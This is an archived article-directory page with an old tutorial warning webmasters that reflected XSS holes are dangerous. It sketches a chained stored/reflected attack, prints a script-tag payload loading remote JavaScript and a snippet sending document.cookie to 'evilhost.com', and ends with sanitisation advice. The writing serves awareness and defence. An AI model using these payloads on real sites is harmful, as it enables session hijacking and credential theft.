In this little paper I will try to convince admins, webmaster
and in general everyone is concerned to secure a web site of how
dangerous can be a XSS hole. I will not cover in depth what XSS
is because there’s a huge library on this topic available on
internet and on www.hackerscenter.com/library
–[ 2.0 XSS So what’s XSS? XSS stands for cross site scripting,
that is a way to inject script code into a web page making it
execute whenever the page loads or a specific event is triggered.
2.1 Temporary XSS
A factor because of which this kind of bug is understimated is
due to the “temporary xss” as I use to call them. Temporary xss
are script codes executed only when a script code within a
crafted input is issued by the user.
Example: http://vuln.host.com/search.asp?q=
<![CDATA[
<p>The above example will inject a “
<plaintext>” tag in the<br />
search.asp page showing the source html code of the page The<br />
point here is: Who searched for
<plaintext> will see the source<br />
code but this not implies any permanent alteration of the page.</p>
<p> 2.2 Permanent XSS</p>
<p>A “permanent XSS” as I use to call them, are due to unsanitized<br />
input by user that will be saved on a database for example. Each<br />
time these unsanitized fields are read from the database and<br />
printed on the page the script will be executed. (A lot of<br />
registration forms server side scripts are affected by this kind<br />
of vuln)</p>
<p>–[ 3.0 Attacks</p>
<p>What I want to demonstrate in this article is how dangerous can<br />
be a temporary xss. Most of the webmaster (99%, believe me),<br />
treat this kind of bug as very very low level issue because of<br />
the reasons we have seen. They think it is even a loss of time<br />
to sanitize input that doesn’t go into a database.</p>
<p>What they seem to be unable to understand is that whenever a<br />
malicious user is able to run a client side script from their<br />
domain name a cookie stealing attack can be *easily* taken. This<br />
becomes a high level risk vuln when we deal with ecommerce site,<br />
webmail service and similar.</p>
<p> 3.1 Scenario 1</p>
<p>Let’s assume that we’ve found a xss vuln into 2 sites. The first<br />
will be used as the “dumb” (A) site, that has a permanent xss<br />
hole, while the latter will be a big shopping portal (B) I want<br />
to steal cookie from, that has “just” a little innocent<br />
temporary xss hole.</p>
<p>We mail the big shopping portal admin about the vuln, trying to<br />
make him understand how serious it is the bug. He never reply.<br />
So we decide to have some fun…innocent fun..as much innocent<br />
as their xss hole was, I suppose…</p>
<p>What one could do is to inject a stealth script into the dumb<br />
site to force (always stealthly) every visitor of site A to load<br />
the vulnerable url we have found into site B. Here anyone can<br />
understand that even<br />
http://vuln.host.com/search.asp?q=
<plaintext> is now very very<br />
useful for our purpose. Instead of
<plaintext>, we can use<br />
something like this: http://vuln.host.com/search.asp?q=<script
src='http://myhosting.com/xsstrials/funny.js'></script></p>
<p>Funny.js will be our malicious script code that will be run on<br />
vuln.host.com domain …and it will be similar to this: //<br />
Funny.js navigate to ‘evilhost.com/collect_cookies.asp?cookie=’<br />
+ document.cookie // where collect_cookies.asp will be a server<br />
side script that will collect everything passed by parameter<br />
“cookie” and evilhost.com can be a hosting space set up by the<br />
malicious attacker.</p>
<p>So what happens here? 1. A user visits dumb site thus triggering<br />
our permanent xss. 2. The permanent xss will load the page</p>
<p>http://vuln.host.com/search.asp?q=<script</p>
<p>src='http://myhosting.com/xsstrials/funny.js'></script> that<br />
executes funny.js thanks to the temporary xss hole in the big<br />
shopping portal. 3. funny.js is now loaded on the big shopping<br />
portal domain name letting us steal the cookie (and the login<br />
data) of the dumb site visitor.</p>
<p> By “stealth script” we mean a script that doesn’t change the<br />
appearance of the page so that no one will notice any background<br />
work.</p>
<p> — [ Side effects</p>
<p>In this section I will show some side effects of the xss desease<br />
that are often forgotten or misunderstood by a lot of<br />
analysts/webmasters.</p>
<p>The xss holes, permanent and tempory ones, can be used to attack<br />
a local victim (visitor of the vulnerable site) directly by<br />
injecting a malicious code capable of exploting a local<br />
vulnerability of the victim system. This has become very common<br />
(and easy to do) because of the tons of vulnerabilities that<br />
affect Internet Explorer and the browsers in general. </p>
<p>Let’s take for example a xss hole into trustedsite.com. Anyone<br />
could take advantage of the trustness of this domain to execute<br />
code with high privilege levels, executing or installing<br />
malicious activex. This kind of approach can be taken into<br />
Internet Exlporer and in general in all the browsers that use<br />
the so called trusted “Zones”.</p>
<p>Another important issue that can make a simple XSS hole a high<br />
level risk issue is the capability of attacking thousands<br />
computers into few hours or even into minutes according to the<br />
traffic of the vulnerable page. This kind of practice can lead<br />
to malware/adware spread. If a high traffic page is vulnerable<br />
to a permanent xss a malware/worm/adware coder can choose this<br />
kind of approach to put the seeds of his worm making it spread<br />
in a stealth manner and within few time.</p>
<p> — [ How to solve the problem</p>
<p>Incredible to say, XSS holes are the most simple to solve and<br />
fix. They usually involve script tag but not always. Less known<br />
code can use the image tag with dynsrc or src parameters and<br />
“javascript:alert(‘aaa’)” as argument or the<br />
<style> tag e.g. :</p>
<style type="text/javascript">script goes here</style>
<p> In general the characters to be sanitized are the usual "<" and<br />
">" but there are some more to be carefully escaped: &{code};<br />
will run the code into netscape / mozilla browsers so "&{"<br />
combination of chars should be sanitized too. In the 99% of the<br />
cases an "HTML Encode" would solve the problem. In asp it can be<br />
easily done with the inbuilt function<br />
server.htmlencode(myparameter).</p>
<div class="addtoany_share_save_container"><div class="a2a_kit a2a_target addtoany_list" id="wpa2a_1"><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://articles.org/wp-content/plugins/add-to-any/share_save_256_24.png" width="256" height="24" alt="Share"/></a></div>
<script type="text/javascript"><!--
wpa2a.script_load();
//--></script>
</div>
<!-- end content -->
<div class="tags_link">
<p class="tags_link_p"><strong>Tags</strong></p>
</div>
</div>
<div class="box" style="border-bottom:none; background-color:#efefef;">
<p>
<img src="http://articles.org/wp-content/themes/article_directory/images/no_avatar.gif" alt="admin" style="float:left; display:inline; margin-right:10px; padding:1px; border:1px #b2b2b2 solid;width: 86px; height:86px" /> <strong>Article's Source: </strong><a href="http://articles.org/80563_xss_vulnerabilities_so_understimated_so_dangerous/">http://articles.org/80563_xss_vulnerabilities_so_understimated_so_dangerous/</a><br/> </p>
<div class="sub_icon">
<br />
<ul>
<li><strong>By:</strong>
<a href="http://articles.org/author/admin/" title="Posts by admin" rel="author">admin</a> </li>
<li>
•
</li>
<li><strong>Posted On:</strong> April 19, 2006 </li>
<li>
<strong>
</strong>
</li>
</ul>
</div>
</div>
<!-- COMMENTS -->
<div class="box" style="border-bottom:none; text-align:right;">
<div class="wp-pagenavi">
<p>
</p>
</div>
</div>
</div>
<div class="col_boxgrey4">
<div class="title" style="width:690px; height:34px; border-left:none; border-right:none; border-top:none;">
<h2 style="margin-top:8px;"> Post <span> Comment</span></h2>
</div>
<form id="commentform" action="http://articles.org/wp-comments-post.php" method="post">
<div class="box" id="comment-box">
<div class="comment-box-message" style="display: none">
<div>
</div>
</div>
<div class="register">
<label><strong> Username:</strong> <span class="red">*</span> </label>
<div style="float:left; width:400px;">
<div class="registerby">
<input id="comment-name" type="text" name="author" size="29px" value=""/>
</div>
</div>
</div>
<div class="clear"></div>
<div class="register">
<label><strong> Email:</strong> <span class="red">*</span> </label>
<div style="float:left; width:400px;">
<div class="registerby">
<input id="comment-email" type="text" name="email" size="29px" value=""/>
</div>
</div>
</div>
<div class="clear"></div>
<div class="register">
<label><strong>Website:</strong></label>
<div style="float:left; width:400px;">
<div class="registerby">
<input id="comment-url" type="text" name="url" size="29px" value="""/>
</div>
</div>
</div>
<div class="register">
<label><strong>Message:</strong> </label>
<div style="float:left; width:400px;">
<div class="registerby2">
<textarea id="comment-content" rows="8" cols="30" name="comment"></textarea>
</div>
</div>
</div>
<div class="clear"></div>
<div class="register">
<input style="margin-left:360px;" type="submit" name="submit" value="Post Comment" class="button" />
</div>
</div>
<input type='hidden' name='comment_post_ID' value='80563' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
<p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="7a7f0d5d32" /></p> </form>
</div> <!-- Recent Artcle -->
<div class="col_boxgrey4" style="display:none">
<div class="title" style="width:690px; height:34px; border-left:none; border-right:none; border-top:none;">
<h2 style="margin-top:8px;">
</h2>
</div>
<div class="box" style="border-bottom:none;">
<div class="col_boxgrey5">
<ul>
</ul>
</div>
<!-- ADVERTISING -->
<!-- END ADVERTISING -->
</div>
</div>
</div>
<!-- END BODY -->
<!-- SIDEBAR -->
<div class="col_right">
<div class="col_boxgrey2">
<div class="box2" style="padding-bottom:15px;">
<h2>Related Searches</h2>
</div>
</div>
Twitter Updates <div class="textwidget"><p><script src="http://widgets.twimg.com/j/2/widget.js"></script><br />
<script>
new TWTR.Widget({
version: 2,
type: 'search',
search: 'articlesorg',
interval: 30000,
title: 'The best of Twitter according to',
subject: 'Articles.Org Article Directory',
width: 'auto',
height: 500,
theme: {
shell: {
background: '#ff5e00',
color: '#000000'
},
tweets: {
background: '#ffffff',
color: '#000000',
links: '#ff5e00'
}
},
features: {
scrollbar: false,
loop: false,
live: true,
behavior: 'all'
}
}).render().start();
</script></p>
</div>
</div>
</div>
</div>
</div>
<div style="clear:both;"></div>
<script type="text/javascript">
function recent(){
document.getElementById('st1').style.display ="block";
document.getElementById('st2').style.display ="none";
}
function viewed(){
document.getElementById('st2').style.display ="block";
document.getElementById('st1').style.display ="none";
}
</script>
<!-- END SIDEBAR -->
<!-- FOOTER -->
<div id="footer">
<div class="footer_res">
<div class="footer_main">
<div class="fott_top">
<div class="fott"><h3>Our Newsletter<br /><span>Sign Up For The Latest News</span></h3><div class="search_box"> <form action="http://feedburner.google.com/fb/a/mailverify" target="popupwindow" method="post" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=Articles.org', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<input type="text" name="email" size="25px" value="Enter your e-mail" onfocus="if (this.value == 'Enter your e-mail') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter your e-mail' ;}" />
<input id="bottom-search-button" type="submit" value="Ok" class="button" size="" />
<input value="Articles.org" name="uri" type="hidden"/>
<input value="en_US" name="loc" type="hidden"/>
</form>
</div><p>Sign up our free newsletter. Articles Organization is a free and shared article directory. The registration and the membership on the website are free. You can submit your articles and promote your business. </p></div><div class="fott"><h3>Socialize!<br /><span>Follow Us</span></h3><p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout.</p><div class="icon"><a href="http://twitter.com/articlesorg"><img src="http://articles.org/wp-content/themes/article_directory/images/icon_t.png" alt=""/></a><a href="http://www.facebook.com/pages/Articles-Organization/140232106038330"><img src="http://articles.org/wp-content/themes/article_directory/images/icon_f.png" alt=""/></a><a href="http://feeds.feedburner.com/Articles-FreeArticleDirectory-Articlesorg"><img src="http://articles.org/wp-content/themes/article_directory/images/icon_rss.png" alt=""/></a><a href="http://www.addthis.com/bookmark.php?v=250&username=orifastlich"><img src="http://articles.org/wp-content/themes/article_directory/images/icon_share.png" alt=""/></a></div></div>
</div>
<div class="fott_top footer_links" style='text-align:center'>
<a href='/articles-about/'>About Us</a> |
<a href='/terms-and-conditions/'>Terms and Conditions</a> |
<a href='/privacy-policy/'>Privacy Policy</a> |
<a href='/wp-content/themes/article_directory/new_contact.php'>Contact Us</a>
</div>
<div class="fott_bottom">
<div class="logo_small">
<img src="http://articles.org/wp-content/themes/article_directory/images/logo_small.png" alt="logo"/> </div>
<div class="copyright">
<p>
<br/><span>Copyright © 2010 Article Directory Powered by WordPress</span>
</p>
<center><h1>Articles.Org - Add Article to the free articles directory</h1></center>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript"><!--
wpa2a.targets=[
{title:'XSS Vulnerabilities, So understimated, so dangerous',url:'http://articles.org/80563_xss_vulnerabilities_so_understimated_so_dangerous/'}];
wpa2a.html_done=true;if(wpa2a.script_ready&&!wpa2a.done)wpa2a.init();wpa2a.script_load();
//--></script>
</body>
</html>
<script type="text/javascript">
jQuery(document).ready(function(){
jQuery('.comment-box-message').hide();
jQuery('#commentform').submit(function(){
if (jQuery.trim(jQuery('#comment-name').val()) == ''){
jQuery('.comment-box-message div').html("Name can't be empty");
jQuery('.comment-box-message').show();
return false;
}
if (jQuery.trim(jQuery('#comment-email').val()) == ''){
jQuery('.comment-box-message div').html("Email can't be empty");
jQuery('.comment-box-message').show();
return false;
}
if (!validateEmail(jQuery('#comment-email').val())){
jQuery('.comment-box-message div').html("Email is invalid");
jQuery('.comment-box-message').show();
return false;
}
if (jQuery.trim(jQuery('#comment-content').val()) == ''){
jQuery('.comment-box-message div').html("Comment content can't be empty");
jQuery('.comment-box-message').show();
return false;
}
jQuery('.comment-box-message').hide();
});
});
</script>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/
Page Caching using disk: enhanced
Database Caching 3/9 queries in 0.044 seconds using memcached
Object Caching 308/319 objects using memcached
Served from: articles.org @ 2013-05-20 18:04:45 -->]]></plaintext></p></div></div>
